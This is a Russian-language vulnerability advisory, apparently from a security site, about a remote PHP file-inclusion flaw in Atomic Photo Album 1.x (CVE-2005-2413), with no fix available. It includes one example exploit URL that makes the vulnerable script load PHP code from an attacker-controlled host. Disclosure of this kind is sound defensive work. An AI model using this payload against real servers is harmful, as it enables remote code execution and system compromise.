Security Lab

PHP-инклюдинг в Atomic Photo Album

Дата публикации:27.07.2005
Всего просмотров:2430
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2413
CVE-2008-4335
CVE-2008-4336
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Atomic Photo Album 1.x
Уязвимые версии: Atomic Photo Album

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует в сценарии 'apa_phpinclude.inc.php' из-за недостаточной обработки входных данных в параметре 'apa_module_basedir'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[target]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[attacker]/

URL производителя: atomicpa.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include